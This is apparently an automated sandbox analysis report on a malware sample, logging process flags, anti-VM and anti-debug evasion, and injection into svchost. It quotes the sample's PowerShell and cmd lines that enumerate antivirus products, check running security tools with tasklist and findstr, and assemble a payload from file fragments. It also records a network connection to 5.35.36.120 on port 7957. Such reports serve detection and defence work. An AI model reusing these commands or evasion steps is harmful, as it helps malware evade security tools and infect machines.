Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	API/Special instruction interceptor: Address: 7FF8C88ED044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FF8C88ED044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 4EBB83A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5362	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4430	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7131	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2473	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6491	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3327	Jump to behavior

Source: C:\Users\user\Desktop\main.exe

API coverage: 2.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep count: 5362 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep count: 4430 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388	Thread sleep count: 7131 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep count: 2473 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544	Thread sleep count: 6491 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540	Thread sleep count: 3327 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: 9_2_00406301 FindFirstFileW,FindClose,		9_2_00406301
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: 9_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		9_2_00406CC7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\542181	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\542181\	Jump to behavior

Source: Amcache.hve.29.dr	Binary or memory string: VMware
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.29.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.29.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.29.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.29.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.29.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: main.exe, 00000000.00000002.2313616960.0000023EC5553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2663479215.0000000002A00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.29.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: svchost.exe, 00000017.00000002.2663687336.0000000002A69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWRSVP UDPv6 Service Provider
Source: svchost.exe, 00000017.00000002.2663575420.0000000002A42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: Amcache.hve.29.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: main.exe, 00000000.00000002.2313616960.0000023EC54C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.29.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.29.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.29.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.29.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.29.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: main.exe, 00000000.00000002.2313616960.0000023EC5553000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: Amcache.hve.29.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: svchost.exe, 00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: Amcache.hve.29.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.29.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.29.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.29.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.29.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.29.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.29.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.29.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual RAM
Source: svchost.exe, 00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: Amcache.hve.29.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.29.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7FE90EEB0 free,IsDebuggerPresent,RaiseException,mbstowcs,malloc,mbstowcs,free,

0_2_00007FF7FE90EEB0

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7FE90A370 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

0_2_00007FF7FE90A370

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 23_3_00470283 mov eax, dword ptr fs:[00000030h]

23_3_00470283

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE8F11B0 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_amsg_exit,	0_2_00007FF7FE8F11B0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE90A6B9 SetUnhandledExceptionFilter,	0_2_00007FF7FE90A6B9
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9EE6A8 SetUnhandledExceptionFilter,	0_2_00007FF7FE9EE6A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 5.35.36.120 7957

Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "(Get-CimInstance Win32_Processor).Name"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "(Get-CimInstance Win32_VideoController).Name"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "try { $avProducts = Get-CimInstance -Namespace 'root/SecurityCenter2' -Class AntiVirusProduct \| Select-Object -ExpandProperty displayName; if ($avProducts) { $avProducts } else { 'No antivirus software detected' } } catch { 'Error detecting antivirus software' }"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 542181	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "exports" Fleece	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier b	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\542181\Flux.com Flux.com b	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"

Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "try { $avproducts = get-ciminstance -namespace 'root/securitycenter2' -class antivirusproduct \| select-object -expandproperty displayname; if ($avproducts) { $avproducts } else { 'no antivirus software detected' } } catch { 'error detecting antivirus software' }"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "try { $avproducts = get-ciminstance -namespace 'root/securitycenter2' -class antivirusproduct \| select-object -expandproperty displayname; if ($avproducts) { $avproducts } else { 'no antivirus software detected' } } catch { 'error detecting antivirus software' }"			Jump to behavior

